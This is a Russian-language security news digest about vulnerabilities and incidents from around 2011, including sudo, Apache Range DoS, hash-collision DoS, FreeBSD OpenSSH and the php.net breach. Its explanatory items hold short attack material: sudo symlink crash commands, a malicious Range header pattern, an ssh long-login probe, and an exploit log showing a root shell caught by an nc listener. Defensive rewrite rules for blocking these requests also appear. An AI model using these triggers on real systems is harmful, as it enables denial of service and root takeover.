Новости Security

Скрыть

Исследователи из финской антивирусной компании F Secure сообщили об обнаружении в диком виде вредоносного ПО, поддерживающего атаку на системы с Windows, Mac OS X и Linux. Распространение вредоносного кода производится через web-сайты, на которые загружается подписанный JAR-архив, содержащий специальный апплет на языке Java. Цифровая подпись сформирована с использованием самодельного сертификата, поэтому перед запуском пользователю выводится надлежащее предупреждение (рассчитывается, что пользователь его проигнорирует и согласится с выполнением операции). После получения управления апплет проверяет тип операционной системы жертвы и задействует подходящий для данной системы троянский код, после чего на систему клиента устанавливается бэкдор с поддержкой удалённого выполнения операций.

>>> Подробнее

Скрыть

В корректирующем релизе утилиты sudo 1.8.3p2, используемой для организации выполнения команд от имени других пользователей, исправлена очень опасная уязвимость. Проблема вызвана ошибкой форматирования строки, которую может эксплуатировать любой пользователь, даже не упомянутый в настройках sudoers. Несмотря на то, что в публичном доступе пока не найдено готовых эксплоитов, потенциально уязвимость может привести к выполнению произвольных команд с правами пользователя root.


Проблема связана с появлением в sudo 1.8.0 нового отладочного режима, предназначенного для использования при разработке правил доступа или для создания плагинов для журналирования ввода/вывода. В функции sudo_debug() была допущена ошибка, связанная с использованием имени программы как части блока форматирования строки в fprintf(). Создав специально оформленную символическую ссылку на sudo и запустив утилиту по этой ссылке (или иными способами добившись подмены argv[0]), появляется возможность эксплуатации уязвимости.


Например:

bash



    $ ln -s /usr/bin/sudo ./%s
    $ ./%s -D9
    Segmentation fault
 

Рекомендуется срочно обновить sudo 1.8.x до версии 1.8.3p2. Старые версии, младше релиза 1.8.0, выпущенного в феврале 2011 года, проблеме не подвержены (например, в Ubuntu 10.04 LTS используется 1.7.2p1, в Ubuntu 11.10 - 1.7.4p6, в Slackware - 1.7.4p6). В качестве временной меры защиты можно снять suid-флаг с исполняемого файла sudo. Для систем с поддержкой FORTIFY_SOURCE, например, NetBSD и большинство дистрибутивов Linux, можно пересобрать sudo, активировав в src/Makfile опцию "-D_FORTIFY_SOURCE=2". На момент написания новости обновления были доступны только для FreeBSD и Gentoo. Пакет с sudo из состава Fedora 16 (возможно это касается и RHEL 6) изначально собран с опцией D_FORTIFY_SOURCE=2, т.е. не подвержен эксплуатации. Статус выпуска обновлений для различных дистрибутивов можно проследить на родных страницах вашего дистра.

Цельнотянуто с Opennet.ru

>>> Подробнее

Скрыть

В версиях Xorg 1.11 и выше была обнаружена критическая уязвимость, которая позволяет не зная пароля разблокировать систему при помощи комбинаций клавиш Ctrl + Alt + * (которая на NumPad'е). Данная комбинация предназначена для убивания приложения, которое захватило экран.

В настоящий момент эта версия Xorg используется в некоторых новых дистрибутивах, в том числе Fedora 16 и ArchLinux.

// паста с лор0

>>> Подробнее

Скрыть

На проходящей в Берлине конференции Chaos Communication Congress (28c3) обнародован новый способ нарушения работоспособности web-сервисов, основанный на особенности реализации структур хэшей, используемых для организации хранения наборов данных в представлении ключ/значение, в широком спектре языков программирования. Манипулируя используемыми в качестве ключей данными, атакующий может затратив минимальные ресурсы инициировать возникновение предсказуемых коллизий в алгоритме хэширования, разрешение которых требует дополнительных значительных процессорных ресурсов.

Большинство web-фреймворков и web-приложений на этапе разбора HTTP POST-запроса автоматически размещают передаваемые пользователем параметры в хэше, что позволяет атакующему контролировать наполнение хэша. В зависимости от языка программирования для достижение 100% загрузки CPU достаточно сформировать поток запросов интенсивностью всего в несколько килобит в секунду. При этом степень создаваемой нагрузки пропорциональна размеру передаваемого в хэш числа ключей с коллизиями. Хэш-функция генерирует на основании строки 64- или 32-разрядное целое число, при возникновении коллизии две разные входные строки дают одинаковое итоговое число. При обнаружении коллизии в хэш-функциях используются различные методы для обеспечения хранения вызывающих коллизии значений, как правило требующие дополнительного перебора и сверки значений (совпадающие значения сохраняются в виде дерева или линейного списка). Трудоёмкость добавления "n" проблемных ключей составляет O(n**2), т.е. на разбор большого числа вызывающих коллизии ключей современному CPU могут потребоваться часы.

Например, при лимите на размер POST запроса в 1 Мб, Python фреймворк Plone тратит около 7 минут процессорного времени на запись в хэш 1 Мб данных (набор специально оформленных ключей), вызывающих коллизии (для успешной DoS-атаки на CPU Core Duo достаточно потока в 20 kbit/s). Для фреймворков на языке Ruby 1.8.7 при лимите на размер POST-запроса в 2 Мб на парсинг двухмегабайтного блока данных на CPU i7 будет потрачено около 6 часов (!), т.е. для поддержания постоянной 100% нагрузки достаточно потока в 850 бит в секунду. Для PHP разбор POST-запроса размером 300 Кб занимает примерно 30 секунд процессорного времени, 500 Кб - минуту, 8 Мб - около 5 часов.

Проблеме подвержены все языки программирования и фреймворки, в которых не используется дополнительная рандомизация значений в функциях хэширования, например, уязвимы Java (Tomcat, Geronimо, Jetty, Glassfish), JRuby, PHP, Python, Rubinius, Ruby 1.8.7, V8 JavaScript Engine и ASP.NET. Проблема не затрагивает язык Perl и ветку Ruby 1.9.x, так как в этих языках уже используется внесение случайных изменений при формировании хэшей. В Perl проблема была устранена ещё в 2003 году, после публикации отчёта о возможности совершения подобной атаки. В PHP уязвимость исправлена в версии 5.4.0RC4, также планируется выпустить корректирующий релиз PHP 5.3.9. Проблема также исправлена в CRuby 1.8.7-p357, JRuby 1.6.5.1, Apache Tomcat 5.5.34/6.0.34/7.0.22, Rack 1.4.0/1.3.6/1.2.5/1.1.3. Эксплуатация проблемы в Python и Ruby имеет дополнительные нюансы, отличающиеся для 64- и 32-разрядных сборок.

Предсказать вызывающие коллизии значения не представляет труда, так как в вышеупомянутых языках как правило используются две реализации хэш-функций DJBX33A и DJBX33X, разработанные Дэниэлом Бернштейном (Daniel Bernstein, автор qmail и djbdns). Хэш-функция DJBX33A используется в PHP5, Ruby 1.8 и Java. DJBX33X в PHP4, ASP.NET, Python и JavaScript (v8). Кроме языков программирования данные хэш-функции применяются в широком спектре проектов, от ядра Linux до социальной сети Facebook, а также в таких языках, как Lua, Erlang и Objective-C, что открывает возможные новые векторы для атак.

В качестве мер для минимизации влияния представленной атаки называется ограничение максимального процессорного времени, затрачиваемого на выполнение скрипта (RLimitCPU в Apache или max_input_time в настройках PHP), ограничение максимального размера POST-запроса (для PHP - post_max_size) и ограничение максимального числа разбираемых параметров (в php 5.4 или suhosin-сборке PHP - suhosin.post.max_vars и suhosin.request.max_vars).

>>> Подробнее

Скрыть

В http-сервере Apache найдена опасная уязвимость, позволяющая вызвать отказ в обслуживании через исчерпание всей доступной памяти. Опасность уязвимости усугубляется тем, что для её осуществления уже доступен готовый эксплоит (  http://seclists.org/fulldisclosure/2011/Aug/175 ), позволяющий совершить атаку с одной машины с генерацией минимального трафика. При отсутствия отдельных лимитов на размер выделяемой Apache памяти, после выполнения эксплоита наблюдается полное исчерпание памяти с уходом в бесконечный своппинг без возможности зайти в консоль.

Проблема вызвана ошибкой в реализации поддержки загрузки части файла по указанному диапазону (например, после обрыва соединения можно запросить загрузку начиная с определенной позиции). Ошибка связана с тем, что при обработке запроса, содержащего большое число диапазонов (например, "Range:bytes=0-,5-1,5-2,5-3,...,5-1000"), расходуется слишком много памяти. Для осуществления удачной атаки достаточно отправить около 50 подобных запросов на сервер.

Проблема присутствует в Apache 2.2.x, включая последний релиз 2.2.19. Исправление пока доступно в виде патча (  http://www.gossamer-threads.com/lists/apache/dev/401638 ). Также имеется несколько способов временной защиты, не требующих пересборки Apache. Например, можно принудительно очищать заголовок Range при помощи mod_header ("RequestHeader unset Range") или блокировать длинные последовательности Range через mod_rewrite:

# Вариант 1:

RewriteEngine On

RewriteCond %{HTTP:Range} bytes=0-[0-9]+, [NC,OR]

RewriteCond %{HTTP:Range} bytes=([0-9-],){4,} [NC,OR]

RewriteCond %{HTTP:Range} bytes=[0-9,-]+,0-(,|$) [NC]

RewriteRule .?  http://%{SERVER_NAME}/ [NS,L,F]

 # Вариант 2:

RewriteEngine On

RewriteCond %{REQUEST_METHOD} ^(HEAD|GET) [NC]

RewriteCond %{HTTP:Range} ([0-9]*-[0-9]*)(s*,s*[0-9]*-[0-9]*)+

RewriteRule .* - [F]

# Вариант 3:

RewriteEngine On

RewriteCond %{HTTP:Range} bytes=0-.* [NC]

RewriteRule .?  http://%{SERVER_NAME}/ [R=302,L]

 

Интересно, что о теоретической возможности совершения подобной атаки Михаил Залевски (Michal Zalewski), известный польский эксперт в области компьютерной безопасности в настоящее время работающий в Google, сообщал еще 4 года назад, но проблема по каким-то причинам не была воспринята всерьез и исправления не были внесены.

Цельнотянуто с Opennet.ru

>>> Подробнее

Скрыть

Тихо и незаметно в списке рассылки full-disclosure представлена критическая уязвимость в используемой во FreeBSD 4.x версии OpenSSH, позволяющая удаленному злоумышленнику без аутентификации получить root-доступ к системе. Уже создан и публично опубликован эксплоит, позволяющий получить привилегированный shell на подверженных уязвимости серверах.

Уязвимость проявляется для протоколов SSH1 и SSH2. Проблема вызвана ошибкой в реализации аутентификации с использованием PAM на платформе FreeBSD. Проблема присутствует в функции "pam_thread()" из файла auth2-pam-freebsd.c.  http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c Начиная с версии FreeBSD 5.2 содержащий уязвимость файл auth2-pam-freebsd.c был заменен новой реализацией, т.е. с большой долей вероятности можно утверждать, что новые версии FreeBSD проблеме не подвержены. 100% уверенности пока нет, так как точно не ясно, не перекочевал ли проблемный код в какие-либо библиотеки PAM или сторонние реализации OpenSSH, используемые и поныне. Детальный аудит ещё предстоит провести.

Ошибка проявляется при передаче слишком длинного имени пользователя. Простой способ проверить наличие уязвимости - попытаться обратиться к своему серверу, указав логин порядка 100 символов. Например: "ssh -l`perl -e 'print "A" x 100'` хост", в случае проблемы, можно наблюдать крах рабочего процесса sshd и вывод в лог /var/log/messages сообщения "/kernel: pid N (sshd), uid 0: exited on signal 11 (core dumped)". Изучение core-дампа показало, что проблема подвержена эксплуатации, так как атакующий может контролировать указатель перехода и позиционировать его на shellcode. Прототип рабочего эксплоита был успешно создан путем небольшой модификации кода ssh-клиента из пакета OpenSSH 5.8p2.

$ ./ssh -1 192.168.1.1 $ nc -v -l -p 10000 listening on [any] 10000 ... 192.168.1.1: inverse host lookup failed: Unknown host connect to [192.168.1.2] from (UNKNOWN) [192.168.1.1] 1038 uname -a FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005 /GENERIC i386

id

uid=0(root) gid=0(wheel) groups=0(wheel)

Поддержка ветки FreeBSD 4.x прекращена ещё в 2007 году, но данная версия все еще используется на некоторых серверах в сети. Пользователям версии FreeBSD 4.x рекомендуется срочно обновить OpenSSH до более новой версии. В качестве обходного пути решения проблемы следует разрешить через пакетный фильтр доступ по SSH только для доверительных хостов и отключить поддержку PAM, указав в настройках "ChallengeResponseAuthentication no". Информации о возможности поражения других операционных систем, использующих устаревшие версии OpenSSH с реализацией поддержки PAM от проекта FreeBSD, пока нет.

Тянуто c Opennet.ru

>>> Подробнее

Скрыть

В трех популярных плагинах к свободной системе управления контентом WordPress обнаружены бэкдоры, позволяющие злоумышленнику получить управление над CMS. Вредоносные вставки присутствовали в плагинах AddThis, WPtouch и W3 Total Cache. Всем пользователям недавно устанавливавшим данные плагины рекомендуется срочно обновить компоненты WordPress и провести анализ возможного проникновения злоумышленников в систему.

В связи с инцидентом, разработчики WordPress приняли решение сбросить все пароли разработчиков на сайтах WordPress.org, bPress.org и BuddyPress.org, а также блокировать доступ ко всем репозиториям расширений, до момента окончания аудита их содержимого. Для доступа к форумам, трекеру ошибок и репозиториям разработчикам следует сгенерировать новый пароль. Интегрированный в плагины бэкдор был тщательно замаскирован и находился в составе плагинов как минимум несколько дней. В настоящее время вредоносный код удален и в репозитории возвращены версии плагинов, созданные до момента совершения атаки.

Путь, который использовался для внедрения бэкдоров, пока не отслежен. Известно, что включение вредоносного кода произведено без ведома разработчиков пораженных плагинов. В качестве наиболее вероятной гипотезы называется получение атакующими параметров для работы под учетными записями разработчиков некоторых дополнений, от имени которых были внесены изменения в репозитории с кодом. Способ получения параметров доступа пока не ясен.

>>> Подробнее

Скрыть

Как многие помнят, в 2010 году компания Google объявила об инициативе Chromium Security Reward, в рамках которой выплачивает вознаграждения энтузиастам, обнаружившим уязвимости в безопасности браузера Chromium, лежащего в основе Chrome. Выяснилось, что больше всех в этом преуспел студент из Тюмени Сергей Глазунов.

С выпуском очередной стабильной версии веб-браузера Google Chrome — 12 — был обнародован и обновленный «зал славы» программы Chromium Security Reward. Ведущие позиции в нем у Сергея, который за все это время смог получить от Google почти 50 тысяч USD ($48452 за 36 найденных уязвимостей).

Стоит отметить, что в Google приняты интересные размеры выплат: помимо стандартных 500 и 1000 USD есть и «элитные» — в размере 1337 и даже 3133,7 USD (последних — всего две, и обе на счету у Сергея). Числа «1337» и «31337» являются отсылкой к жаргону хакеров былых времен и читаются как «leet» и «eleet» соответственно (являются цифровой записью умышленно искаженной интерпретации слова «элита»).

По данным CNews, Сергей Глазунов учится в Институте математики и компьютерных наук ТюмГУ по специальности «Компьютерная безопасность».

Зал славы «Security Hall of Fame» проекта Chromium доступен на  http://www.chromium.org/Home/chromium-security/hall-of-fame

>>> Подробнее

Скрыть

Закон против онлайн-пиратства, принятый в стране сегодня, 14 апреля, делает нелегальным совместное использование файлов (file sharing) и файлообменные сети. Вот тебе, бабушка, и новозеландский Юрьев день...

Одиозный закон позволяет владельцам авторских прав уведомлять интернет-провайдеров о нарушениях. Провайдеры, в свою очередь, высылают «нарушителям» (обладателям уличённых аккаунтов) до трёх предупреждений.

Если пользователь игнорирует обращения, дело может дойти до Суда по авторским правам и обернуться штрафом в 15 тыс. новозеландских долларов ($12 тыс.). Или — браво! — даже полугодовым блокированием доступа в Сеть.

С распространением файлообменных сетей доходы «творческой индустрии», как она сама считает, значительно сократились. Новый закон призван «положить конец незаконному обмену файлами» (а законного, как вы поняли, теперь не осталось вовсе) и «защитить правообладателей». Так считает один из лоббистов нововведения — министр торговли Новой Зеландии Саймон Пауэр.

Принятие прошло почти единогласно — против выступили только «зелёные» и два инди-депутата. Мнение пользователей, обвинивших парламентариев в непонимании основ сетевой деятельности вообще и совместного использования файлов в частности, никого не интересовало.

Закон вступает в силу 1 сентября этого года, однако мобильных сетей он не коснётся вплоть до октября 2013-го.

«Антипиратские» законы, касающиеся интернет-пользования, есть во многих странах. Одно из самых суровых уложений действует во Франции: согласно закону от 2009 года, за незаконное скачивание контента нарушителю грозит до €300 тыс. штрафа или тюремное заключение.

>>> Подробнее

Скрыть

История со взломом wiki-сайта проекта PHP получила продолжение. На нескольких китайских ресурсах, посвященных компьютерной безопасности, появилось заявление (сообщение на китайском языке, перевод на английский) об успешном проведении подстановки кода в исходные тексты интерпретатора PHP. В уведомлении утверждается, что кроме wiki.php.net был получен доступ к другим хостам инфраструктуры PHP, а также перехвачены параметры входа для нескольких аккаунтов участников проекта. Судя по тексту заявления, подстановка кода была произведена с целью демонстрации возможности проведения успешной атаки на web-инфраструктуру проекта PHP.

Интегрированные в SVN-репозиторий проекта изменения носят демонстрационный характер и не представляют угрозы (если конечно, это единственное внесенное изменение, в чем сомневаются эксперты компании VUPEN). В частности, в код PHP (файл ext/standardcredits.c) было интегрировано безобидное упоминание вымышленного разработчика "Wolegequ Gelivable" в блок с перечислением участников проекта. Изменение внесено в trunk-репозиторий PHP, которое почти сразу было отменено и не отразилось на конечных релизах (коммит носил абсурдный характер и его трудно было не заметить). Изменение было внедрено в конце декабря и широко не афишировалось, разработчик чей аккаунт был взломан поменял пароли, а разбирательство причин перехвата пароля в то время не привело как каким-либо результатам.

Что касается взлома wiki.php.net, то для проникновения была использована уязвимость в wiki-движке DokuWiki, которая, судя по всему, остается неисправленной, так как последние известные уязвимости в DokuWiki, которые могли привести к подобного рода атакам, датированы 2006 и 2005 годами (возможен также вариант, что движок wiki.php.net не обновлялся последние 5 лет). Для упрощения дальнейших проникновений в систему совершившие атаку установили на сервер web-shell PHPHC. Пока не понятно, каким образом атакующие смогли поднять свои привилегии в системе, с одной стороны на сервере wiki.php.net было использовано устаревшее Linux-ядро, последнее обновление которого было произведено в 2009 году (в 2010 году в ядре было устранено несколько опасных уязвимостей), но с другой стороны ядро было собрано с усиливающими безопасность патчами GRSecurity.

PHP является лакомым куском для внедрения бэкдора - число установок mod_php исчисляется десятками миллионов, интерпретатор используется в таких крупных проектах, как Facebook, Yahoo, Wikipedia и WordPress.

>>> Подробнее